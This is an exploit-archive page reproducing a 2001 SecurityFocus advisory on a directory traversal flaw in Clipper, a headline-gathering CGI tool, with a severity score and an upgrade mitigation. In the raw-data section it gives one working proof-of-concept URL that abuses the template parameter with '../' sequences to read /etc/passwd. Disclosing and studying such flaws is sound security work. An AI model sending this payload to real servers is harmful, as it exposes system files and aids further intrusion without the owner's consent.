header-logo
Suggest Exploit
vendor:
Clipper
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Clipper
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2001

Clipper Directory Traversal Vulnerability

Clipper is a headline-gathering tool from Anaconda! Partners which, in certain versions, is vulnerable to directory traversal attacks. By including '/../' sequences in requested URLs, an attacker can cause the retrieval of arbitrary files, compromising the privacy of user data and potentially obtaining information which could be used to further compromise the host's security.

Mitigation:

Upgrade to the latest version of Clipper.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2512/info

Clipper is a headline-gathering tool from Anaconda! Partners which, in certain versions, is vulnerable to directory traversal attacks.

By including '/../' sequences in requested URLs, an attacker can cause the retrieval of arbitrary files, compromising the privacy of user data and potentially obtaining information which could be used to further compromise the host's security. 

http://www.target.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR